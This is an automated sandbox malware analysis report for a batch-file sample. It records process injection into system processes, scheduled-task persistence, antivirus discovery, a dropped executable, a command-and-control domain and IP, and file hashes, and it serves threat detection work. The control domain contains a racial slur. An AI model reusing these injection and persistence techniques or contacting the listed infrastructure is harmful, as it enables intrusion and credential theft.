Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\$nya-onimai2\IfMUlU.exeQueries volume information: C:\Windows\$nya-onimai2\IfMUlU.exe VolumeInformation
Source: C:\Windows\System32\dllhost.exeCode function: 8_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,8_2_0000000140002300
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC648090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_00000225DC648090
Source: dllhost.exe, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.26.drBinary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts11
Windows Management Instrumentation
1
Scripting
1
DLL Side-Loading
1
Disable or Modify Tools
1
Credential API Hooking
1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Native API
1
DLL Side-Loading
1
Access Token Manipulation
1
Obfuscated Files or Information
11
Input Capture
2
File and Directory Discovery
Remote Desktop Protocol1
Credential API Hooking
1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts12
Command and Scripting Interpreter
11
Scheduled Task/Job
713
Process Injection
1
Install Root Certificate
Security Account Manager122
System Information Discovery
SMB/Windows Admin Shares11
Input Capture
1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts11
Scheduled Task/Job
Login Hook11
Scheduled Task/Job
1
Timestomp
NTDS241
Security Software Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts2
PowerShell
Network Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
Process Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
File Deletion
Cached Domain Credentials131
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
Rootkit
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job121
Masquerading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Modify Registry
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron131
Virtualization/Sandbox Evasion
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
Access Token Manipulation
Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task713
Process Injection
KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers2
Hidden Files and Directories
GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1574678 Sample: x.bat Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 78 Malicious sample detected (through community Yara rule) 2->78 80 .NET source code references suspicious native API functions 2->80 82 Found large BAT file 2->82 84 9 other signatures 2->84 10 cmd.exe 1 2->10         started        13 IfMUlU.exe 2->13         started        process3 signatures4 118 Suspicious powershell command line found 10->118 120 Suspicious command line found 10->120 15 powershell.exe 3 30 10->15         started        18 WMIC.exe 1 10->18         started        20 conhost.exe 10->20         started        22 2 other processes 10->22 122 Machine Learning detection for dropped file 13->122 process5 signatures6 124 Uses schtasks.exe or at.exe to add and modify task schedules 15->124 126 Deletes itself after installation 15->126 128 Writes to foreign memory regions 15->128 132 3 other signatures 15->132 24 dllhost.exe 1 15->24         started        27 cmd.exe 1 15->27         started        29 cmd.exe 2 15->29         started        32 conhost.exe 15->32         started        130 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->130 process7 file8 106 Contains functionality to inject code into remote processes 24->106 108 Writes to foreign memory regions 24->108 110 Creates a thread in another existing process (thread injection) 24->110 116 2 other signatures 24->116 34 winlogon.exe 24->34 injected 36 lsass.exe 24->36 injected 39 svchost.exe 24->39 injected 51 23 other processes 24->51 112 Suspicious powershell command line found 27->112 114 Suspicious command line found 27->114 41 powershell.exe 2 31 27->41         started        45 WMIC.exe 1 27->45         started        47 conhost.exe 27->47         started        53 2 other processes 27->53 72 C:\Windows\$rbx-onimai2\$rbx-CO2.bat, DOS 29->72 dropped 49 conhost.exe 29->49         started        signatures9 process10 dnsIp11 55 dllhost.exe 34->55         started        86 Installs new ROOT certificates 36->86 88 System process connects to network (likely due to code injection or exploit) 39->88 74 iam.nigga.dad 103.230.121.81, 4782, 49736 VPSQUANUS Hong Kong 41->74 70 C:\Windows\$nya-onimai2\IfMUlU.exe, PE32+ 41->70 dropped 90 Writes to foreign memory regions 41->90 92 Modifies the context of a thread in another process (thread injection) 41->92 94 Hides that the sample has been downloaded from the Internet (zone.identifier) 41->94 96 2 other signatures 41->96 58 schtasks.exe 41->58         started        76 iam.nigga.dad 51->76 file12 signatures13 process14 signatures15 98 Protects its processes via BreakOnTermination flag 55->98 100 Injects code into the Windows Explorer (explorer.exe) 55->100 102 Writes to foreign memory regions 55->102 104 2 other signatures 55->104 60 svchost.exe 55->60 injected 62 spoolsv.exe 55->62 injected 64 svchost.exe 55->64 injected 66 svchost.exe 55->66 injected 68 conhost.exe 58->68         started        process16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
x.bat0%ReversingLabs
SourceDetectionScannerLabelLink
C:\Windows\$nya-onimai2\IfMUlU.exe100%Joe Sandbox ML
C:\Windows\$nya-onimai2\IfMUlU.exe5%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://word.office.comSRD1#0%Avira URL Cloudsafe
https://powerpoint.office.comSRD130%Avira URL Cloudsafe
https://powerpoint.office.com%0%Avira URL Cloudsafe
https://outlook.comSRD1-0%Avira URL Cloudsafe
https://excel.office.comSRD1%0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
iam.nigga.dad
103.230.121.81
truetrue
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://word.office.comsvchost.exe, 00000031.00000000.2219839835.0000020D264CE000.00000004.00000001.00020000.00000000.sdmpfalse
      high
      http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
        high
        https://powerpoint.office.com%svchost.exe, 00000031.00000002.2309382553.0000020D25613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2210065535.0000020D25613000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001C.00000002.2348049601.00000253A6312000.00000004.00000001.00020000.00000000.sdmpfalse
          high
          http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
            high
            http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
              high
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001C.00000002.2348049601.00000253A6312000.00000004.00000001.00020000.00000000.sdmpfalse
                high
                https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yqMicrosoft-Windows-PushNotification-Platform%4Operational.evtx.26.drfalse
                  high
                  https://aka.ms/pscore6powershell.exe, 0000001C.00000002.2348049601.00000253A6041000.00000004.00000001.00020000.00000000.sdmp, Null.5.dr, Null.28.drfalse
                    high
                    http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      https://powerpoint.office.comsvchost.exe, 00000031.00000000.2210065535.0000020D25613000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        http://schemas.microsvchost.exe, 0000001D.00000002.2312973165.00000241A96E0000.00000002.00000001.00040000.00000000.sdmpfalse
                          high
                          https://github.com/Pester/Pesterpowershell.exe, 0000001C.00000002.2348049601.00000253A6312000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            https://aka.ms/pscore6xG_powershell.exe, 0000001C.00000002.2348049601.00000253A6041000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 0000000A.00000000.1990365949.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2296144477.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                https://excel.office.comSRD1%svchost.exe, 00000031.00000002.2367360741.0000020D260D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2377995052.0000020D26484000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2309382553.0000020D25613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2214085696.0000020D26029000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2210065535.0000020D25613000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/wsdl/lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    https://powerpoint.office.comSRD13svchost.exe, 00000031.00000002.2377995052.0000020D26484000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2383762701.0000020D26586000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2384491857.0000020D265BD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2221218953.0000020D265BD000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://outlook.comSRD1-svchost.exe, 00000031.00000002.2377995052.0000020D26484000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2383762701.0000020D26586000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://word.office.comSRD1#svchost.exe, 00000031.00000002.2377995052.0000020D26484000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2383762701.0000020D26586000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2210283099.0000020D25681000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2316304169.0000020D25681000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://aka.ms/pscore68powershell.exe, 0000001C.00000002.2348049601.00000253A6041000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 0000000A.00000000.1990365949.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2296144477.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000001C.00000002.2348049601.00000253A6041000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            103.230.121.81
                                            iam.nigga.dadHong Kong
                                            62468VPSQUANUStrue
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1574678
                                            Start date and time:2024-12-13 13:38:46 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 10m 59s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:22
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:30
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Critical Process Termination
                                            Sample name:x.bat
                                            Detection:MAL
                                            Classification:mal100.spyw.evad.winBAT@34/71@1/1
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 60
                                            • Number of non-executed functions: 333
                                            Cookbook Comments:
                                            • Found application associated with file extension: .bat
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe
                                            • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63, 20.190.147.5, 20.42.73.29
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                            • VT rate limit hit for: x.bat
                                            TimeTypeDescription
                                            07:39:58API Interceptor2x Sleep call for process: WMIC.exe modified
                                            07:40:01API Interceptor87x Sleep call for process: powershell.exe modified
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            103.230.121.81product.batGet hashmaliciousUnknownBrowse
                                              test.exeGet hashmaliciousUnknownBrowse
                                                Filezilla-stage2.exeGet hashmaliciousUnknownBrowse
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  iam.nigga.dadproduct.batGet hashmaliciousUnknownBrowse
                                                  • 103.230.121.81
                                                  test.exeGet hashmaliciousUnknownBrowse
                                                  • 103.230.121.81
                                                  Filezilla-stage2.exeGet hashmaliciousUnknownBrowse
                                                  • 103.230.121.81
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  VPSQUANUSproduct.batGet hashmaliciousUnknownBrowse
                                                  • 103.230.121.81
                                                  test.exeGet hashmaliciousUnknownBrowse
                                                  • 103.230.121.81
                                                  Filezilla-stage2.exeGet hashmaliciousUnknownBrowse
                                                  • 103.230.121.81
                                                  rebirth.dbg.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 103.252.20.25
                                                  mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 103.122.177.128
                                                  la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                  • 154.91.52.33
                                                  file.exeGet hashmaliciousXWormBrowse
                                                  • 103.230.121.124
                                                  file.exeGet hashmaliciousXWormBrowse
                                                  • 103.230.121.124
                                                  word.exeGet hashmaliciousXWormBrowse
                                                  • 103.230.121.124
                                                  svchost.exeGet hashmaliciousXWormBrowse
                                                  • 103.230.121.124
                                                  No context
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  C:\Windows\$nya-onimai2\IfMUlU.exeproduct.batGet hashmaliciousUnknownBrowse
                                                    Hydra.ccLoader.batGet hashmaliciousUnknownBrowse
                                                      NhoqAfkhHL.batGet hashmaliciousUnknownBrowse
                                                        Process:C:\Windows\System32\lsass.exe
                                                        File Type:very short file (no magic)
                                                        Category:modified
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3::
                                                        MD5:93B885ADFE0DA089CDF634904FD59F71
                                                        SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                        SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                        SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                        Malicious:false
                                                        Preview:.
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):9713
                                                        Entropy (8bit):4.940954773740904
                                                        Encrypted:false
                                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                                                        MD5:BA7C69EBE30EC7DA697D2772E36A746D
                                                        SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                                                        SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                                                        SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                                                        Malicious:false
                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):2892
                                                        Entropy (8bit):5.437969087793142
                                                        Encrypted:false
                                                        SSDEEP:48:oizsSU4y4RQmFoUL5a+m9qr9t5/78NWR8lgxJZKaVEouYAgwd64rHLjtvk:oizlHyIFKEg9qrh7KWBJ5Eo9Adrxk
                                                        MD5:F187E059B6AB94D3F218253CA180C199
                                                        SHA1:20203FAC2034CC4A6F3E0119DC02B9CACEF2973C
                                                        SHA-256:238A0A4F0560A22C11544F0312F7EB787D4B5C60994C6B0904487045CB410AA0
                                                        SHA-512:5BFC8D7159ADC154ECDBC2B8EC716277FEA72E1573C362BF84208AC36056E1FC864636C882C3C272AF9C5F9F7B1E1E56D1DB671A7B01A490040E652850331B0F
                                                        Malicious:false
                                                        Preview:@...e...........................................................H..............@-....f.J.|.7h8..+.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...|...........System.Configuration4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
